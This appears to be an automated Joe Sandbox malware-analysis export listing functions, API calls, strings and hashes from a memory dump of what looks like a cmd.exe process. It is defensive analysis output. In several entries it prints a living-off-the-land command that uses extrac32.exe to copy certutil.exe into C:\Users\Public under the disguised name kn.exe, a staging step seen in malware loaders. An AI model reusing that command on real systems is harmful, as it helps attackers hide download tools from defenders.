Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
String ID: =,;$extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
API String ID: 3964947564-1020921460
Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
Instruction ID: b69311d75f13c885a960aae7419b46a420881b9824bd41c6fc5553543cb49c99
Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
Instruction Fuzzy Hash: E7026961A09787DAFB189B21A84617876A5FF49B94F5C413DE90EFB7A4DF3CA400C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F802A0 Relevance: 35.3, APIs: 13, Strings: 7, Instructions: 279COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 00007FF683F802C2
_wcsicmp.MSVCRT ref: 00007FF683F802E4
_wcsicmp.MSVCRT ref: 00007FF683F80306
_wcsicmp.MSVCRT ref: 00007FF683F80328
_wcsicmp.MSVCRT ref: 00007FF683F8034A
_wcsicmp.MSVCRT ref: 00007FF683F80368
_wcsicmp.MSVCRT ref: 00007FF683F86CF2
_wcsicmp.MSVCRT ref: 00007FF683F86D61
_wcsicmp.MSVCRT ref: 00007FF683F86D7F
_wcsicmp.MSVCRT ref: 00007FF683F86D9D
_wcsicmp.MSVCRT ref: 00007FF683F86DBB
iswspace.MSVCRT ref: 00007FF683F86E01
wcschr.MSVCRT ref: 00007FF683F86E2C

Strings

=,;, xrefs: 00007FF683F86E1C
FOR, xrefs: 00007FF683F802BB
;, xrefs: 00007FF683F803FD
IF/?, xrefs: 00007FF683F80321
REM, xrefs: 00007FF683F80343
REM/?, xrefs: 00007FF683F80361
FOR/?, xrefs: 00007FF683F802DD, 00007FF683F86CE9

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: _wcsicmp$iswspacewcschr
String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
API String ID: 840959033-3627297882
Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
Instruction ID: 538f25ce431c11675a09306b61b172360e259773bd378baf1f802cd99e033535
Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
Instruction Fuzzy Hash: CAD14921E48643C6FB199F22A8472B966A4FF44B48F8C403DDA5EF72A5DF2CE405C790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F8081C Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 130COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF683F8084E
_wcsicmp.MSVCRT ref: 00007FF683F8088E
_wcsicmp.MSVCRT ref: 00007FF683F808AC
_wcsicmp.MSVCRT ref: 00007FF683F808CA
_wcsicmp.MSVCRT ref: 00007FF683F808E8
_wcsicmp.MSVCRT ref: 00007FF683F80906
_wcsicmp.MSVCRT ref: 00007FF683F80924
_wcsicmp.MSVCRT ref: 00007FF683F8093E
_wcsicmp.MSVCRT ref: 00007FF683F8095C

Strings

CMDCMDLINE, xrefs: 00007FF683F808DE
CMDEXTVERSION, xrefs: 00007FF683F808C0
ERRORLEVEL, xrefs: 00007FF683F808A2
.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC, xrefs: 00007FF683F80835
HIGHESTNUMANODENUMBER, xrefs: 00007FF683F80952
TIME, xrefs: 00007FF683F8091A
DATE, xrefs: 00007FF683F808FC
RANDOM, xrefs: 00007FF683F80934

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: _wcsicmp$EnvironmentVariable
String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
API String ID: 198002717-267741548
Opcode ID: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
Instruction ID: 8f0c73b3d66070a81c303c81957a3f7f4121fd1c691f5ba0c2199a67430508f5
Opcode Fuzzy Hash: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
Instruction Fuzzy Hash: 9D512D25A48643D6FA145B12A912279ABA1FF49BC4F8CA039D90EB37A4DF3CE445C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F7EF40 Relevance: 33.7, APIs: 16, Strings: 3, Instructions: 465COMMON

Download Yara Rule

APIs

iswspace.MSVCRT ref: 00007FF683F7F000
wcschr.MSVCRT ref: 00007FF683F7F031
iswdigit.MSVCRT ref: 00007FF683F7F0D6

Strings

=,;, xrefs: 00007FF683F7EF9D, 00007FF683F7F1CE, 00007FF683F7F342, 00007FF683F7F61A
Ungetting: '%s', xrefs: 00007FF683F8D0E1
()|&=,;", xrefs: 00007FF683F7F3EC, 00007FF683F7F6D0

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: iswdigitiswspacewcschr
String ID: ()|&=,;"$=,;$Ungetting: '%s'
API String ID: 1595556998-2755026540
Opcode ID: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
Instruction ID: a4e43c808c9cb5df71c23281708551b5d70a3c0fe6649418320423c6c89608d8
Opcode Fuzzy Hash: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
Instruction Fuzzy Hash: 9E2266A5E0C79AC2FA649B15E84627926B1BF04790F8C813ED99DF72E4DF3CA441C790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F7D3F0 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 310memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F7D46E
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F7D485
wcschr.MSVCRT ref: 00007FF683F7D4EE
iswspace.MSVCRT ref: 00007FF683F7D54D
wcschr.MSVCRT ref: 00007FF683F7D569
wcschr.MSVCRT ref: 00007FF683F7D58C
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F7D5EE
HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F7D605
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F7D61F
HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F7D633

Strings

=,;, xrefs: 00007FF683F7D4D0
", xrefs: 00007FF683F7D5AB

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Heap$Processwcschr$Alloc$Sizeiswspace
String ID: "$=,;
API String ID: 3545743878-4143597401
Opcode ID: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
Instruction ID: a293739d3d6a253af419840a442544e8644f9023afaa5b12768b9f66a41a45b7
Opcode Fuzzy Hash: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
Instruction Fuzzy Hash: D4C18E61A09692C3EB655B1194023B9B6B1FF49F85F8D803DEE4EA7394EF7CA445C280

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F95BF4 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 153windowthreadCOMMON

Download Yara Rule

APIs

FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F95CD5
GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF683F95D54

Strings

(caller: %p) , xrefs: 00007FF683F95D3F
, xrefs: 00007FF683F95DA7
Msg:[%ws] , xrefs: 00007FF683F95DC2
FailFast, xrefs: 00007FF683F95C85
Exception, xrefs: 00007FF683F95CA0
%hs!%p: , xrefs: 00007FF683F95D1F
LogHr, xrefs: 00007FF683F95C8E
%hs(%u)\%hs!%p: , xrefs: 00007FF683F95D01
%hs(%d) tid(%x) %08X %ws, xrefs: 00007FF683F95D6D
[%hs], xrefs: 00007FF683F95E1D
[%hs(%hs)], xrefs: 00007FF683F95E04
ReturnHr, xrefs: 00007FF683F95C97
CallContext:[%hs] , xrefs: 00007FF683F95DDD

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: CurrentFormatMessageThread
String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
API String ID: 2411632146-3173542853
Opcode ID: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
Instruction ID: fd70b5fa9de32a35a2b76de5da819686f2bc2f170774a31f33593f9928a38781
Opcode Fuzzy Hash: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
Instruction Fuzzy Hash: AA618661A0DA82C1EA64DF61A5061B973A1FF48B98F48013EDE4DB7758DF3CE544C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F826E0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 187fileCOMMON

Download Yara Rule

APIs

CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F8277D
_open_osfhandle.MSVCRT ref: 00007FF683F8279E

Strings

con, xrefs: 00007FF683F827EF

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: CreateFile_open_osfhandle
String ID: con
API String ID: 2905481843-4257191772
Opcode ID: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
Instruction ID: eb588a0e2d6d45a62d200e94bfdec5176a9107a04f46900a62f469d0294bcc6d
Opcode Fuzzy Hash: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
Instruction Fuzzy Hash: A2712C32608681DAE7648F16E40127DBAA0FF89B65F584239DE5EA37D4DF3CE449CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F993E8 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF683F833A8: iswspace.MSVCRT ref: 00007FF683F833C0

wcsrchr.MSVCRT ref: 00007FF683F99465

Part of subcall function 00007FF683F89158: RtlCaptureContext.NTDLL ref: 00007FF683F89163
Part of subcall function 00007FF683F89158: RtlLookupFunctionEntry.NTDLL ref: 00007FF683F89182
Part of subcall function 00007FF683F89158: RtlVirtualUnwind.NTDLL ref: 00007FF683F891CF
Part of subcall function 00007FF683F89158: __raise_securityfailure.LIBCMT ref: 00007FF683F89245

wcschr.MSVCRT ref: 00007FF683F99486
wcsrchr.MSVCRT ref: 00007FF683F994C1
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF683F994E5
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF683F994FC
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF683F99519
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF683F9952A
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF683F99541
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF683F9955E
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF683F99587
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF683F995E1
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF683F995FD

Strings

, xrefs: 00007FF683F995BA

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
String ID:
API String ID: 3829876242-3916222277
Opcode ID: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
Instruction ID: 34f58af858ac310d8347ea70c3eb177996771dffae6a4b7b2b7bb709256ba1e5
Opcode Fuzzy Hash: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
Instruction Fuzzy Hash: 3E616226A08642C6EA149F11E41217AB7A1FFC9B94F4D913DDE0EA7794DF3CE905C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683FA1A40 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683FA1AA6
memset.MSVCRT ref: 00007FF683FA1ACC

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683FA1B3E
GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683FA1B67
GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683FA1BD7
_wcsicmp.MSVCRT ref: 00007FF683FA1C05
_wcsicmp.MSVCRT ref: 00007FF683FA1C34
_wcsicmp.MSVCRT ref: 00007FF683FA1C63
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683FA1C89
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683FA1CA9

Strings

NTFS, xrefs: 00007FF683FA1BFA
CSVFS, xrefs: 00007FF683FA1C58
REFS, xrefs: 00007FF683FA1C29

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
String ID: CSVFS$NTFS$REFS
API String ID: 3510147486-2605508654
Opcode ID: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
Instruction ID: b60a6032791027867ebc67dfb4c5921f5cc3da710fc0ffad876e69d12330fcc7
Opcode Fuzzy Hash: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
Instruction Fuzzy Hash: EC613932608BC2CAEB658F21D8463E977A4FF45B89F494039DA0DAB758DF78D208C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F772B0 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 283COMMON

Download Yara Rule

APIs

longjmp.MSVCRT(?,00000000,00000000,00007FF683F77279,?,?,?,?,?,00007FF683F7BFA9), ref: 00007FF683F94485

Strings

FOR, xrefs: 00007FF683F94535
GEQ , xrefs: 00007FF683F947C1
FOR /?, xrefs: 00007FF683F94654
EQU , xrefs: 00007FF683F9477D
== , xrefs: 00007FF683F94765
IF /?, xrefs: 00007FF683F94664
GTR , xrefs: 00007FF683F947B5
NEQ , xrefs: 00007FF683F9478B
LSS , xrefs: 00007FF683F94799
REM /?, xrefs: 00007FF683F94678
LEQ , xrefs: 00007FF683F947A7

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: longjmp
String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
API String ID: 1832741078-366822981
Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
Instruction ID: 2f81d827a5d2f0a87739406526e429887b9892100ec187d0a41f6ff5c0fe9725
Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
Instruction Fuzzy Hash: CDC17C60E2C682C1E668DF56A5866B827A1BF56B84F9C003EDD0DF7791CF2CA449C3C1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F7FC30 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F7FC38
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F7FC52
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF683F80181
memset.MSVCRT ref: 00007FF683F8D580
longjmp.MSVCRT ref: 00007FF683F8D59F
memmove.MSVCRT ref: 00007FF683F8D5C4
longjmp.MSVCRT ref: 00007FF683F8D5FC
longjmp.MSVCRT ref: 00007FF683F8D62B
longjmp.MSVCRT ref: 00007FF683F8D660

Strings

extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe , xrefs: 00007FF683F7FD7F, 00007FF683F8D585, 00007FF683F8D5CB
0123456789, xrefs: 00007FF683F7FDEE

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
String ID: 0123456789$extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
API String ID: 1606811317-3961020649
Opcode ID: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
Instruction ID: c75d5d927b8a22a97ae424ffcb87a43044c2e092f4af186d15d9f89b90dba56d
Opcode Fuzzy Hash: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
Instruction Fuzzy Hash: 9FD19F61E08B86C2EB149B25A8062B977A0FF45794F8C423ADE5DA77A5DF3CE405C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683FA03AC Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 219COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683FA0411
memset.MSVCRT ref: 00007FF683FA0436
memset.MSVCRT ref: 00007FF683FA0459

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683FA0590
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683FA05A0
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683FA05BB
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683FA06F3
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683FA0712
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683FA0731

Strings

~, xrefs: 00007FF683FA046D
%04X-%04X, xrefs: 00007FF683FA0698

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: memset$ErrorLast$InformationVolume
String ID: %04X-%04X$~
API String ID: 2748242238-2468825380
Opcode ID: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
Instruction ID: a1d95c49a6bb0dfb1937d2056fb0ac370509c739025271c283527045359377f5
Opcode Fuzzy Hash: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
Instruction Fuzzy Hash: 8EA1A462708BC2CAEB658F21D8512E977A1FF85789F488039DA4DABB48DF3CD645C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F8662C Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 170COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 00007FF683F86677
iswdigit.MSVCRT ref: 00007FF683F8668F
_errno.MSVCRT ref: 00007FF683F866A3
wcstol.MSVCRT ref: 00007FF683F866C4
iswdigit.MSVCRT ref: 00007FF683F866E4
iswalpha.MSVCRT ref: 00007FF683F866FE

Strings

+-~!, xrefs: 00007FF683F86670
APerformUnaryOperation: '%c', xrefs: 00007FF683F8F78E

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

